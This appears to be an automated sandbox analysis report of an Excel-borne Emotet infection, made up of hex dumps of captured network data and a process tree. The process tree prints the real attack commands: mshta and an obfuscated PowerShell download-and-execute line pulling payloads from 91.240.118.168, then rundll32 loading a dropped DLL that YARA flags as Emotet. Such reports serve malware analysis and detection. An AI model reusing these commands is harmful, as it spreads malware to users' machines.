                                                                                                                                  2022-01-28 20:04:55 UTC422INData Raw: 03 7c bb 8e db 75 e5 d6 ee 02 b1 94 d5 5c 43 f5 83 69 a2 22 df 17 34 6f ed 03 a7 e2 30 e6 e9 6e 7f b0 fb 5b 13 48 d5 b1 af 10 c7 7d 69 2f 83 ab 48 e8 58 ef ed b3 ed 35 b2 7a ac c1 14 e2 94 a0 97 aa 59 a0 27 69 6f f3 44 b1 d4 67 75 a5 c3 fb e7 4d 29 07 b0 20 59 83 79 d0 35 eb 68 9f 41 0b 51 dc c1 fb c7 a8 3b f9 b2 ce 70 d5 fc 56 f3 49 3c 32 f7 29 4e 86 96 d9 40 5c 11 5b c8 2d 89 e1 26 5e c2 f1 8d 4f 92 32 f7 6a b7 1d 90 de be 44 3b 67 de 9f cc a3 90 90 48 97 d1 8a dc 6c 0c 32 6a 27 f1 70 55 fe e8 27 76 5d 31 dc 59 f5 53 80 7d 4c 7f d8 52 84 a8 36 28 49 fd bb 60 41 a7 1a 91 10 6d 3e ed a2 cb a1 a1 ad cb d2 e9 7e b5 c0 b1 74 7a 27 50 ec f9 f7 7d 64 71 25 fb 02 7f 99 62 9f d6 0f 73 29 96 70 00 45 63 f4 4d 60 91 4f 87 68 e5 83 89 8e 1a 67 2e e7 23 ab a5 e7 17
                                                                                                                                  Data Ascii: |u\Ci"4o0n[H}i/HX5zY'ioDguM) Yy5hAQ;pVI<2)N@\[-&^O2jD;gHl2j'pU'v]1YS}LR6(I`Am>~tz'P}dq%bs)pEcM`Ohg.#
                                                                                                                                  2022-01-28 20:04:55 UTC430INData Raw: 62 2b 5f b1 37 27 0d 28 f6 6d ee ec ae 1c a7 73 a3 17 4c 30 5d 1c d1 79 e9 f0 61 ba 0d 1b 4b 9e 05 f1 fb 9b fb 65 4c 44 8a 6c b3 2d cd 6b bb 40 e0 75 16 83 cb 4a 7f b6 2d 00 ec 4d 08 6f cb aa 65 42 69 5f d2 25 cc a6 bc 65 ba 7a 48 a2 3f 8d d8 de cc 83 41 c8 ac 0b 4f 6d d4 0b 5d 49 77 92 45 33 ba af 54 a0 82 20 8b 32 12 8a 67 e5 e3 49 3e c1 36 35 a2 f4 9b b3 1c 08 af 83 39 d3 d9 3f 2a 0d 82 a1 7b c4 e5 83 01 35 b4 16 43 28 54 59 c4 c1 3f 25 78 bf 23 cb 42 7f bb 83 11 e4 30 22 0c 36 a6 50 98 96 c5 b0 95 ef 99 5d 19 8b d4 74 f7 46 79 ec cb c4 65 80 5f 36 f7 bc ab 1a 8d cb 1b 6d 73 d3 e3 9d 35 74 1e aa d2 54 9b 4d c9 23 22 b3 cb cc c8 a7 34 31 72 a7 4b 16 cc a3 04 3f df 3d 95 fb 48 d0 0b c7 d6 18 b1 86 da 74 66 d8 7e 72 72 22 ef d2 3b 32 12 32 4b 34 19 e9 14
                                                                                                                                  Data Ascii: b+_7'(msL0]yaKeLDl-k@uJ-MoeBi_%ezH?AOm]IwE3T 2gI>659?*{5C(TY?%x#B0"6P]tFye_6ms5tTM#"41rK?=Htf~rr";22K4
                                                                                                                                  2022-01-28 20:04:55 UTC437INData Raw: 98 11 36 18 a2 7c 2e e9 7a ff 15 58 29 5f 60 b8 c5 43 8f db c6 99 b0 ca 87 e0 33 5d 67 fa f4 e5 9d 01 7b e2 db c6 3e da c4 86 1f b7 73 b0 75 00 eb 5a f8 ba 1f a5 c2 71 0e 15 79 e3 94 f4 19 d6 b6 0e 7f f1 57 5c cc 37 94 6d b2 66 61 d8 1c ea 2f e0 ca 6e a8 aa fe b5 3e d9 13 1d 9e 63 78 60 63 e5 b8 9e 01 6a 2a e5 a4 63 16 e9 0f 13 f8 20 db a3 f4 37 4b f0 28 88 8f a3 8c d2 cc e0 84 63 99 02 c2 0b 79 ba ae 12 82 d8 e6 56 f7 5f c5 8f 54 a3 5b 8a 5d 20 24 4f 64 4e cd 77 4b c3 45 cc d5 0e a7 64 b2 2d c7 f9 50 d2 a1 58 d1 df 3e 6e 89 d2 f4 5a 05 82 1e 88 e4 e3 52 16 11 f9 95 41 b5 6f dd 9d 3a bf 79 0a 19 3d 84 22 6e aa 81 c0 84 91 14 42 78 2a 01 c8 78 04 5d a6 6a 89 c0 53 00 c7 27 a6 35 8e 54 1d ed 84 12 87 3c f7 96 53 c6 20 0e e6 10 20 ed 78 6b f1 b1 d8 29 fe 65
                                                                                                                                  Data Ascii: 6|.zX)_`C3]g{>suZqyW\7mfa/n>cx`cj*c 7K(cyV_T[] $OdNwKEd-PX>nZRAo:y="nBx*x]jS'5T<S xk)e
                                                                                                                                  2022-01-28 20:04:55 UTC445INData Raw: fb ca 94 6a 58 ad 17 e7 78 c1 4d a2 67 7e 85 42 96 16 d7 18 56 20 14 15 aa dd 34 36 28 a9 1b ed dd a6 26 14 92 0b 54 09 24 ca 9a 2a d1 e0 bc 75 a1 14 14 82 4d 29 36 26 29 20 b6 64 6b 62 25 07 94 f2 1e 40 1e f7 55 34 c2 06 05 de 18 d9 e3 09 8a bd 64 99 19 bc ac 27 f1 fb c3 a1 fa 7b 2f 4a fa f7 a6 87 f9 e6 4a 93 95 99 20 f4 12 ed 5e 9e ca ae 56 54 66 d0 45 3e d9 7c 2a e4 b1 28 d9 dd 14 a7 6d f2 5c c0 a8 0b 72 01 42 37 7e ad b2 14 f9 ad fb 58 7f dd 31 93 10 d0 be 43 85 89 9c 94 fe 0a dd d6 12 31 aa cc 3c f3 ee a0 e1 8d 46 7d 12 5f 4f e8 12 dd bd 51 ee 0f a8 ee a3 bb 4f f4 cd aa 48 56 23 b8 18 28 fe 3e fd 2c 13 c2 29 22 cd 1c cc 59 47 76 db 11 f8 4e a1 3c 2a 2d ad 02 20 f7 fc 6b 29 3c 43 b4 0d 6b cf be 03 29 64 9a 08 17 24 1b 8b c1 14 eb 10 72 6d a5 6e 23 a5
                                                                                                                                  Data Ascii: jXxMg~BV 46(&T$*uM)6&) dkb%@U4d'{/JJ ^VTfE>|*(m\rB7~X1C1<F}_OQOHV#(>,)"YGvN<*- k)<Ck)d$rmn#
                                                                                                                                  2022-01-28 20:04:55 UTC453INData Raw: 86 e3 ae 01 c9 fd 38 39 44 73 1d 4d 1b 8a 5c 83 2c 4e 5c 13 b1 3d c1 62 3a 1c 9b be b4 ba dc 2a a2 15 f0 ce eb bd ff 2c 1a d2 59 15 03 f7 e8 63 d0 0f 3c 88 d2 ba d6 c2 19 f2 d0 bd 0a 43 dd 86 7b a5 26 3b 82 3a 5b 6a 4f 28 e4 50 46 57 16 61 b0 78 5a a2 4a 8d fb a2 e5 86 b8 1d 65 36 09 f5 03 f3 fd e1 b4 3d ab f2 96 f0 18 ac 00 09 ab 2c 1a 66 e0 9d 28 e7 e8 f1 8f 02 d0 eb 24 28 9e 91 d4 4f 8b 11 15 ef ba d5 2a 41 6d ba 1e 7b 7b cd b1 34 d4 62 76 52 96 06 fa b0 f8 24 08 bb 46 14 e7 bc f6 f6 79 99 71 61 65 1f d0 74 4d 28 0d af ee 2f af 4d 99 f4 d6 4a 75 c3 36 20 8c 0c df 43 85 76 58 4b 34 86 a4 28 17 d2 7d d2 1f cc 05 80 37 47 3a 93 29 f4 8d 3b 4e ef 5f 89 00 22 0e 83 22 dd 4c 70 0c 62 bf 47 73 27 76 7d 83 3d fa 10 77 ca 7b 0e fb 4f fa d4 5a 32 fd 0b 91 f5 b8
                                                                                                                                  Data Ascii: 89DsM\,N\=b:*,Yc<C{&;:[jO(PFWaxZJe6=,f($(O*Am{{4bvR$FyqaetM(/MJu6 CvXK4(}7G:);N_""LpbGs'v}=w{OZ2
                                                                                                                                  2022-01-28 20:04:55 UTC461INData Raw: 90 9e d4 db 06 db ab 57 46 d4 c8 29 5b 07 c7 72 df 27 5c ac 1d 63 29 3f 2c 39 c2 5b 4c c6 1a 49 97 3d be f0 bd 65 03 2f 8b 39 30 2d 18 e9 bf 6f 8b e1 4e fb 03 1a 7c 7e a4 92 54 96 db 60 48 5c a9 e2 52 a1 53 dc 1b 5f 4c 9a 4d 67 7d bb 82 26 5f c7 6e 23 78 0b 73 a5 8c 59 73 bc f9 18 7f d0 57 88 a6 4c f1 0b 78 3c c7 ca 44 34 43 cd 61 ba 33 6a 21 27 31 5f 66 85 16 3c 06 e1 f1 55 5b 08 c8 0c 18 cd 35 07 59 ed d8 09 1f 93 c6 ca 74 02 1f d0 a9 18 bf 1c 6a 2f 0a 3b bf a0 0b 68 13 d0 a2 bc 0d 94 f6 df 03 5b 15 ca f3 24 f4 ee 09 a1 54 40 ff 5c 4b 18 30 63 25 c9 d3 48 bc 07 57 6b 70 fa af 84 45 00 c4 6e de 67 43 f8 96 90 09 8e 66 43 0c 29 27 91 d8 ad c0 0d 30 29 67 24 c1 ba 3e 4d b8 b7 7b a8 d5 ab 39 af 08 0d 6c c5 e7 4f d6 d6 84 75 1b 60 63 b3 66 50 54 ea ac 0d a3
                                                                                                                                  Data Ascii: WF)[r'\c)?,9[LI=e/90-oN|~T`H\RS_LMg}&_n#xsYsWLx<D4Ca3j!'1_f<U[5Ytj/;h[$T@\K0c%HWkpEngCfC)'0)g$>M{9lOu`cfPT
                                                                                                                                  2022-01-28 20:04:55 UTC468INData Raw: 5a 93 9c a7 79 3f ff f2 85 6d 82 0e 69 c9 f1 e7 e6 be 9f 21 67 44 30 d5 bd d5 3a 40 4a af c6 da 16 3f e4 e0 ae d0 a3 e5 db d4 a9 6b 57 1e e8 f3 98 4f 5d 20 73 df 37 55 c2 3f a1 0d b4 cd d3 40 f9 f3 e9 50 50 52 de 0f 6f 67 a2 87 22 5e 94 1e 08 dc 5f bb bd 15 5a 0b b5 0f c9 f8 9f 59 a2 46 49 18 27 54 88 49 14 6b fa 91 67 be e0 1b 8a 2a c9 c4 dd df a8 37 3e 22 7a 64 b6 66 eb 23 23 19 99 4b d6 fe 83 09 11 f0 d0 a1 17 2a e3 90 b3 0a c7 64 99 20 05 02 5e 72 e9 4e bb 8d 2c 8f b3 99 cf bd ac 52 81 76 7a 38 0f 0e d3 3f 40 1e 01 98 29 63 31 28 1f 9c 7d 8f 27 3f 71 1c e5 f9 9d f0 7a ad 01 bd 7c 8a 08 4f b8 f5 40 e2 1b 58 35 cf 00 e4 2c 3d f4 11 db 2b 94 88 74 4b 3b b8 d1 d9 18 43 f9 ba 9c d1 74 eb e3 6c 72 57 5b d1 7e 83 a8 8c 7e 4e d2 48 66 2c 68 8a 86 ae f1 7c bf
                                                                                                                                  Data Ascii: Zy?mi!gD0:@J?kWO] s7U?@PPRog"^_ZYFI'TIkg*7>"zdf##K*d ^rN,Rvz8?@)c1(}'?qz|O@X5,=+tK;CtlrW[~~NHf,h|
                                                                                                                                  2022-01-28 20:04:55 UTC476INData Raw: 2a 4f 3d 7b e3 d6 21 a9 a2 72 7b c2 24 30 f6 e8 22 ba 79 37 56 49 f2 51 4c b7 3e f0 cc 04 c7 93 e8 15 c1 24 8d f0 86 cd bf b7 83 46 8c c6 c1 27 72 2a a1 36 5a 4c 03 d3 04 48 f3 12 84 d7 4d a9 19 29 a0 e2 99 c8 be 4b f9 3b 3e 6d dc cd 14 f7 a1 2b 3e eb 44 d7 38 14 88 11 b1 66 9a 59 b9 65 7e b2 68 b3 d6 6e 26 e0 40 eb 52 e6 47 64 72 41 d0 25 ed 96 c5 cd c0 46 c4 98 d6 63 a5 7e 96 8c 6e 7e 6f 31 2e af 13 23 f8 07 a0 fc 09 9d 82 0f 25 54 31 16 9c 93 03 92 e5 0a 12 76 a7 ef ab 2e 31 d8 d2 b9 b7 c5 75 45 b3 36 57 cf 86 39 9e 64 72 a8 43 c7 11 83 39 b7 a7 ad bb b0 25 32 4f 76 f2 db 45 77 7d ec 6b 07 5a 40 84 31 c1 bb f1 c2 0b e7 c8 a7 cc 81 af 6a f8 8c 97 22 8e 63 9d 91 da 70 0a ed c2 77 11 91 03 d7 04 66 aa 40 75 13 67 5a e1 a9 14 dd 79 30 86 69 c0 6f ac 69 18
                                                                                                                                  Data Ascii: *O={!r{$0"y7VIQL>$F'r*6ZLHM)K;>m+>D8fYe~hn&@RGdrA%Fc~n~o1.#%T1v.1uE6W9drC9%2OvEw}kZ@1j"cpwf@ugZy0ioi
                                                                                                                                  2022-01-28 20:04:55 UTC484INData Raw: 1c 07 f0 3c 3c 0f f8 3e 7c 1f fc 3f fc 3f fe 3f fc 7f ff 3f fc ff ff c0 03 ff ff c0 03 ff ff e0 07 ff ff f0 0f ff ff f8 1f ff ff fc 3f ff ff fe 7f ff ff ff ff ff ff ff ff ff ff ff ff ff 10 00 0f 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 01 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                  Data Ascii: <<>|?????( @
                                                                                                                                  2022-01-28 20:04:55 UTC492INData Raw: 64 00 65 00 20 00 74 00 6f 00 20 00 61 00 63 00 63 00 65 00 73 00 73 00 20 00 25 00 31 00 20 00 70 00 61 00 73 00 74 00 20 00 69 00 74 00 73 00 20 00 65 00 6e 00 64 00 2e 00 30 00 41 00 6e 00 20 00 61 00 74 00 74 00 65 00 6d 00 70 00 74 00 20 00 77 00 61 00 73 00 20 00 6d 00 61 00 64 00 65 00 20 00 74 00 6f 00 20 00 72 00 65 00 61 00 64 00 20 00 66 00 72 00 6f 00 6d 00 20 00 74 00 68 00 65 00 20 00 77 00 72 00 69 00 74 00 69 00 6e 00 67 00 20 00 25 00 31 00 2e 00 14 00 25 00 31 00 20 00 68 00 61 00 73 00 20 00 61 00 20 00 62 00 61 00 64 00 20 00 66 00 6f 00 72 00 6d 00 61 00 74 00 2e 00 22 00 25 00 31 00 20 00 63 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 64 00 20 00 61 00 6e 00 20 00 75 00 6e 00 65 00 78 00 70 00 65 00 63 00 74 00 65 00 64 00 20 00 6f
                                                                                                                                  Data Ascii: de to access %1 past its end.0An attempt was made to read from the writing %1.%1 has a bad format."%1 contained an unexpected o
                                                                                                                                  2022-01-28 20:04:55 UTC500INData Raw: 80 3d 85 3d 8c 3d 94 3d 9b 3d a2 3d aa 3d b0 3d b6 3d bc 3d c1 3d c8 3d d0 3d d7 3d de 3d e6 3d eb 3d f2 3d f8 3d 00 3e 07 3e 0f 3e 16 3e 1d 3e 25 3e 2b 3e 32 3e 3a 3e 40 3e 46 3e 4d 3e 55 3e 5c 3e 63 3e 6b 3e 71 3e 77 3e 7d 3e 83 3e 8a 3e 92 3e 99 3e a0 3e a8 3e ae 3e b5 3e bb 3e c2 3e c9 3e d1 3e d8 3e df 3e e7 3e ec 3e f3 3e fb 3e 01 3f 07 3f 0e 3f 15 3f 1c 3f 23 3f 2b 3f 36 3f 41 3f 48 3f 4f 3f 57 3f 60 3f 6a 3f 73 3f 7a 3f 81 3f 8b 3f 96 3f 9f 3f aa 3f b1 3f bc 3f c4 3f cd 3f d6 3f e1 3f ec 3f f3 3f fa 3f 00 00 00 60 00 00 dc 02 00 00 02 30 0b 30 15 30 1e 30 25 30 2c 30 36 30 41 30 4a 30 55 30 5c 30 67 30 6f 30 78 30 81 30 8c 30 97 30 9e 30 a5 30 ad 30 b6 30 c0 30 c9 30 d0 30 d7 30 e1 30 ec 30 f5 30 00 31 07 31 12 31 1a 31 23 31 2c 31 3d 31 43 31 49
                                                                                                                                  Data Ascii: ===================>>>>>%>+>2>:>@>F>M>U>\>c>k>q>w>}>>>>>>>>>>>>>>>>>>>?????#?+?6?A?H?O?W?`?j?s?z???????????????`0000%0,060A0J0U0\0g0o0x0000000000000001111#1,1=1C1I
                                                                                                                                  2022-01-28 20:04:55 UTC508INData Raw: 9c 3f e3 3f 00 00 00 50 04 00 30 01 00 00 0c 30 35 30 58 30 85 30 a9 30 c4 30 df 30 f4 30 fe 30 0d 31 19 31 25 31 31 31 37 31 3c 31 42 31 4e 31 54 31 58 31 5e 31 62 31 68 31 6c 31 71 31 76 31 7b 31 80 31 85 31 8a 31 8f 31 94 31 99 31 9e 31 aa 31 b6 31 bc 31 c0 31 c6 31 ca 31 d0 31 d4 31 da 31 e3 31 e8 31 ed 31 f2 31 f7 31 fc 31 01 32 06 32 0b 32 17 32 22 32 2a 32 30 32 34 32 3a 32 3e 32 44 32 48 32 4d 32 52 32 57 32 5c 32 61 32 66 32 6b 32 70 32 75 32 81 32 8d 32 93 32 97 32 9d 32 a1 32 a7 32 ab 32 b1 32 ba 32 bf 32 c4 32 c9 32 ce 32 d3 32 d8 32 dd 32 e2 32 f0 32 fb 32 02 33 08 33 0e 33 12 33 18 33 2a 33 35 33 3c 33 42 33 48 33 4c 33 52 33 62 33 6e 33 7a 33 86 33 92 33 9e 33 a8 33 b2 33 c3 33 cb 33 f2 33 f8 33 fd 33 05 34 0e 34 18 34 23 34 2e 34 3a 34 44
                                                                                                                                  Data Ascii: ??P0050X000000011%11171<1B1N1T1X1^1b1h1l1q1v1{111111111111111111111112222"2*20242:2>2D2H2M2R2W2\2a2f2k2p2u22222222222222222222233333*353<3B3H3L3R3b3n3z33333333333444#4.4:4D
                                                                                                                                  2022-01-28 20:04:55 UTC515INData Raw: 84 31 a4 31 bc 31 d8 31 f8 31 10 32 30 32 58 32 c0 32 0c 33 38 33 58 33 80 33 9c 33 cc 33 f0 33 14 34 38 34 54 34 60 34 64 34 6c 34 70 34 8c 34 98 34 9c 34 a4 34 b0 34 d0 34 00 35 20 35 54 35 74 35 94 35 b0 35 b4 35 e0 35 60 37 70 37 80 37 84 37 88 37 a8 37 fc 38 04 39 0c 39 14 39 1c 39 24 39 2c 39 34 39 3c 39 44 39 4c 39 54 39 5c 39 64 39 6c 39 74 39 7c 39 84 39 8c 39 94 39 9c 39 a4 39 ac 39 b0 39 b8 39 30 3c 34 3c f0 3c f4 3c f8 3c fc 3c 00 3d 04 3d 08 3d 0c 3d 10 3d 14 3d 00 00 00 50 05 00 a4 00 00 00 40 31 38 32 a0 32 b0 32 c0 32 d0 32 e0 32 04 33 10 33 14 33 18 33 1c 33 20 33 28 33 2c 33 d0 33 d4 33 60 34 74 34 78 34 80 34 84 34 88 34 8c 34 90 34 94 34 98 34 9c 34 a0 34 a4 34 a8 34 ac 34 b0 34 b4 34 b8 34 bc 34 c0 34 c4 34 c8 34 cc 34 d0 34 d4 34 d8
                                                                                                                                  Data Ascii: 11111202X22383X33333484T4`4d4l4p44444445 5T5t55555`7p7777789999$9,949<9D9L9T9\9d9l9t9|9999999990<4<<<<<======P@1822222233333 3(3,333`4t4x44444444444444444444444
                                                                                                                                  2022-01-28 20:04:55 UTC523INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  2022-01-28 20:04:55 UTC531INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:


                                                                                                                                  Statistics

                                                                                                                                  CPU Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  Memory Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  High Level Behavior Distribution

                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                  Behavior

                                                                                                                                  Click to jump to process

                                                                                                                                  System Behavior

                                                                                                                                  General

                                                                                                                                  Target ID:0
                                                                                                                                  Start time:21:04:17
                                                                                                                                  Start date:28/01/2022
                                                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                                  Imagebase:0x13f460000
                                                                                                                                  File size:28253536 bytes
                                                                                                                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Target ID:2
                                                                                                                                  Start time:21:04:21
                                                                                                                                  Start date:28/01/2022
                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:cmd /c mshta http://91.240.118.168/zqqw/zaas/fe.html
                                                                                                                                  Imagebase:0x4aaf0000
                                                                                                                                  File size:345088 bytes
                                                                                                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Target ID:4
                                                                                                                                  Start time:21:04:22
                                                                                                                                  Start date:28/01/2022
                                                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:mshta http://91.240.118.168/zqqw/zaas/fe.html
                                                                                                                                  Imagebase:0x13fe10000
                                                                                                                                  File size:13824 bytes
                                                                                                                                  MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Target ID:6
                                                                                                                                  Start time:21:04:24
                                                                                                                                  Start date:28/01/2022
                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                                                                                                                                  Imagebase:0x13f1d0000
                                                                                                                                  File size:473600 bytes
                                                                                                                                  MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Target ID:8
                                                                                                                                  Start time:21:04:41
                                                                                                                                  Start date:28/01/2022
                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
                                                                                                                                  Imagebase:0x4a6f0000
                                                                                                                                  File size:345088 bytes
                                                                                                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Target ID:9
                                                                                                                                  Start time:21:04:41
                                                                                                                                  Start date:28/01/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
                                                                                                                                  Imagebase:0x170000
                                                                                                                                  File size:44544 bytes
                                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.464757421.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high

                                                                                                                                  General

                                                                                                                                  Target ID:10
                                                                                                                                  Start time:21:04:45
                                                                                                                                  Start date:28/01/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                                                                                                                                  Imagebase:0x170000
                                                                                                                                  File size:44544 bytes
                                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.523913691.0000000002621000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.523436520.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.523882749.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.524151860.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.523693615.0000000000AB1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.523730343.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.523853691.00000000025C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.523666393.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.523513402.00000000004F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
